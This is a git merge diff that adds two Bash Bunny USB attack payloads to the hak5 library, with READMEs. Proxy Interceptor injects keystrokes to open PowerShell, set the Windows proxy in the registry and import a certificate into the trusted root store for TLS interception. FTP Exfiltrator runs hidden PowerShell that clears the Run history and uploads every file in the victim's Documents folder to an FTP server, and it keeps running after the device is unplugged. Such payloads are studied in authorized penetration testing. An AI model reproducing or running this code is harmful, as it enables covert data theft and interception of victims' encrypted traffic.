Merge branch 'master' of https://github.com/hak5/bashbunny-payloads

2017-04-07 16:56:56 +10:00 · 2017-04-07 16:56:56 +10:00 · 9deb63d268
parent e0ed65ad9b c14732e57a
commit 9deb63d268
9 changed files with 258 additions and 0 deletions
--- a/payloads/library/Proxy_Interceptor/ImportCert.ps1
+++ b/payloads/library/Proxy_Interceptor/ImportCert.ps1
@ -0,0 +1,6 @@
+#Import variables from vars.ps1 for use.
+. .\vars.ps1
+
+#Add certificate to certificate store
+$certFile = ( Get-ChildItem -Path $certName )
+$certFile | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root
--- a/payloads/library/Proxy_Interceptor/README.md
+++ b/payloads/library/Proxy_Interceptor/README.md
@ -0,0 +1,30 @@
+# Proxy Interceptor for Bash Bunny
+
+Author: NightStalker
+
+Version: 1.0
+
+## Description
+
+This payload will enable a proxy and import an SSL certificate to a Windows
+computer for Internet Explorer and Chrome (FireFox is in progress for 2.0)
+The script uses a combination of Ducky Code and PowerShell.
+
+*Note: Currently no falure LED, if remains red for more than 60 seconds
+script failed. Will build checks in later version.
+
+## Requirements
+
+Certificate needs to be in .pem format and in the root switch directory with
+payload.txt, set the certificate and proxy information in the vars.ps1 file.
+
+## STATUS
+
+| LED              | Status                                |
+| ---------------- | ------------------------------------- |
+| White (blinking) | Script Running.                       |
+| Purple (blinging)| Script Complete.                      |
+
+## Discussion
+
+https://forums.hak5.org/index.php?/topic/40476-payload-proxy-interceptor/
--- a/payloads/library/Proxy_Interceptor/SetProxy.ps1
+++ b/payloads/library/Proxy_Interceptor/SetProxy.ps1
@ -0,0 +1,19 @@
+#Import variables from vars.ps1 for use.
+. .\vars.ps1
+
+#Change the Execution Policy to RemoteSigned and see if Internet Explorere is running and if so close it.
+Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
+$ieProcess = Get-Process iexplore -ErrorAction SilentlyContinue
+if ($ieProcess) {
+	$ieProcess.CloseMainWindow()
+Sleep 5
+if (!$ieProcess.HasExited) {
+    $ieProcess | Stop-Process -Force
+  }
+}
+Remove-Variable ieProcess
+
+#Change the proxy settings in the registry
+$regKey="HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
+Set-ItemProperty -path $regKey ProxyEnable -value 1
+Set-ItemProperty -path $regKey ProxyServer -value $proxyVal
--- a/payloads/library/Proxy_Interceptor/cert.pem
+++ b/payloads/library/Proxy_Interceptor/cert.pem
@ -0,0 +1,4 @@
+-----BEGIN CERTIFICATE-----
+REPLACE WITH CORRECT VALID PEM FORMAT CERTIFICATE
+FROM PROXY FOR SSL INTERCEPTION.
+-----END CERTIFICATE-----
--- a/payloads/library/Proxy_Interceptor/payload.txt
+++ b/payloads/library/Proxy_Interceptor/payload.txt
@ -0,0 +1,65 @@
+#!/bin/bash
+#
+# Title:         Proxy Interceptor
+# Author:        NightStalker
+# Version:       1.0
+#
+#This payload will enable a proxy and import an SSL certificate to a Windows
+#computer for Internet Explorer and Chrome (FireFox is in progress for 2.0)
+#The script uses a combination of Ducky Code and PowerShell.
+#
+# Set proxy and certificate varaibles in vars.ps1, certificate must be in same folder as payload.txt
+#
+# Red Blinking.............Running Payload
+# Purple Blinking .........Payload Completed
+
+#Set Red LED to indicate Starting of Script
+LED R 50
+
+#Set ATTACKMODE to HID and Storage to be able to transfer the certificate
+ATTACKMODE HID STORAGE
+
+#Import Bunny Helpers
+source bunny_helpers.sh
+
+#Start of Script 
+Q DELAY 6000
+Q GUI r
+Q DELAY 100
+Q STRING POWERSHELL
+Q ENTER
+Q DELAY 100
+
+#Change to the directory of the Bunny with the proper switch location
+Q STRING \$driveLetter = \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\'\).Name
+Q ENTER
+Q STRING \$absPath = \$driveLetter\+\'payloads\\\'\+\'$SWITCH_POSITION\'\+\'\\\'
+Q ENTER
+Q STRING cd \$absPath
+Q ENTER
+Q DELAY 500
+
+#Set the proxy in the internet settings in the registry (For IE and Chrome).
+Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\SetProxy.ps1')"
+Q ENTER
+Q DELAY 500
+
+#Import the certificate to the computer (for IE and Chrome).
+Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\ImportCert.ps1')"
+Q ENTER
+Q DELAY 1000
+Q ALT y
+Q DELAY 500
+
+#Unmount the USB Drive.
+Q STRING \$driveEject = New-Object -comObject Shell.Application
+Q ENTER
+Q STRING \$driveEject.Namespace\(17\).ParseName\(\"\$driveLetter\"\).InvokeVerb\(\"Eject\"\)
+Q ENTER
+Q DELAY 500
+Q ALT t
+Q DELAY 500
+Q STRING EXIT
+Q ENTER
+sync
+LED R B 100
--- a/payloads/library/Proxy_Interceptor/vars.ps1
+++ b/payloads/library/Proxy_Interceptor/vars.ps1
@ -0,0 +1,3 @@
+#Set variables for use in payload.
+$proxyVal = "proxyip:port"
+$certName = "cert.pem"
--- a/payloads/library/ftp_exfiltrator/1.ps1
+++ b/payloads/library/ftp_exfiltrator/1.ps1
@ -0,0 +1,78 @@
+clear
+#Clear Run History
+remove-item "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
+
+# Credit to dkittell - https://gist.github.com/dkittell/f029b6c7d1c46ebcffcb
+# I've modified a bit of his code to create a directory with the username, I'm sure there is a better way to do this but not sure how
+
+# FTP Server Variables - edit the xxxxx
+$FTPHost = 'ftp://ftp.xxxxx.com/' + $env:username + '/'
+$FTPUser = 'xxxxx'
+$FTPPass = 'xxxxx'
+ 
+#Directory where to find files to upload
+$UploadFolder = "$env:userprofile\Documents\"
+  
+$webclient = New-Object System.Net.WebClient 
+$webclient.Credentials = New-Object System.Net.NetworkCredential($FTPUser,$FTPPass)  
+ 
+$SrcEntries = Get-ChildItem $UploadFolder -Recurse
+$Srcfolders = $SrcEntries | Where-Object{$_.PSIsContainer}
+$SrcFiles = $SrcEntries | Where-Object{!$_.PSIsContainer}
+
+#Creates Folder with victims Username
+try {
+$makeDirectory = [System.Net.WebRequest]::Create($FTPHost);
+$makeDirectory.Credentials = New-Object System.Net.NetworkCredential($FTPUser,$FTPPass);
+$makeDirectory.Method = [System.Net.WebRequestMethods+FTP]::MakeDirectory;
+$makeDirectory.GetResponse(); 
+}
+catch [Net.WebException] {}
+
+# Create FTP Directory/SubDirectory If Needed - Start
+foreach($folder in $Srcfolders)
+{    
+    $SrcFolderPath = $UploadFolder  -replace "\\","\\" -replace "\:","\:"   
+    $DesFolder = $folder.Fullname -replace $SrcFolderPath,$FTPHost
+    $DesFolder = $DesFolder -replace "\\", "/"
+    # Write-Output $DesFolder
+ 
+    try
+        {
+            $makeDirectory = [System.Net.WebRequest]::Create($DesFolder);
+            $makeDirectory.Credentials = New-Object System.Net.NetworkCredential($FTPUser,$FTPPass);
+            $makeDirectory.Method = [System.Net.WebRequestMethods+FTP]::MakeDirectory;
+            $makeDirectory.GetResponse();
+            #folder created successfully
+        }
+    catch [Net.WebException]
+        {
+            try {
+                #if there was an error returned, check if folder already existed on server
+                $checkDirectory = [System.Net.WebRequest]::Create($DesFolder);
+                $checkDirectory.Credentials = New-Object System.Net.NetworkCredential($FTPUser,$FTPPass);
+                $checkDirectory.Method = [System.Net.WebRequestMethods+FTP]::PrintWorkingDirectory;
+                $response = $checkDirectory.GetResponse();
+                #folder already exists!
+            }
+            catch [Net.WebException] {
+                #if the folder didn't exist
+            }
+        }
+}
+# Create FTP Directory/SubDirectory If Needed - Stop
+ 
+# Upload Files - Start
+foreach($entry in $SrcFiles)
+{
+    $SrcFullname = $entry.fullname
+    $SrcName = $entry.Name
+    $SrcFilePath = $UploadFolder -replace "\\","\\" -replace "\:","\:"
+    $DesFile = $SrcFullname -replace $SrcFilePath,$FTPHost
+    $DesFile = $DesFile -replace "\\", "/"
+    # Write-Output $DesFile
+ 
+    $uri = New-Object System.Uri($DesFile) 
+    $webclient.UploadFile($uri, $SrcFullname)
+}
+# Upload Files - Stop
--- a/payloads/library/ftp_exfiltrator/payload.txt
+++ b/payloads/library/ftp_exfiltrator/payload.txt
@ -0,0 +1,27 @@
+#!/bin/bash
+#
+# Title:         FTP Exfiltrator
+# Author:        Nutt
+# Version:       1.0
+# Target:        Windows
+# 
+#Exfiltrates files from the users Documents folder
+#FTP's all files/folders to a specified FTP site named by the victim hostname.
+#Powershell FTP script will stay running after BashBunny is unplugged, once light turns green unplug and check FTP site.
+
+#Executes 1.ps1
+
+#Purple.........Setup
+#Red............Failed - Need to work on
+#Green..........Finished
+
+# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
+source bunny_helpers.sh
+
+LED R B
+ATTACKMODE HID STORAGE
+QUACK GUI r
+QUACK DELAY 1000
+QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')"
+QUACK ENTER
+LED G
--- a/payloads/library/ftp_exfiltrator/readme.md
+++ b/payloads/library/ftp_exfiltrator/readme.md
@ -0,0 +1,26 @@
+# FTP Exfiltrator for Bash Bunny
+
+* Author: Nutt
+* Version: Version 1.0
+* Target: Windows
+
+## Description
+
+Exfiltrates files from the users Documents folder
+FTP's all files/folders to a specified FTP site named by the victim hostname.
+Powershell FTP script will stay running after BashBunny is unplugged, once light turns green unplug and check FTP site.
+
+## Configuration
+
+Edit 1.ps1 to specify FTP site, username and password
+
+## STATUS
+
+| LED                | Status                                       |
+| ------------------ | -------------------------------------------- |
+| Purple			 | Setup								        |
+| Red                | Failed - Not working yet                     |
+| Green              | Attack Complete                              |
+
+## Discussion
+[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40492-payload-ftp-exfiltrator/ "Hak5 Forum Thread")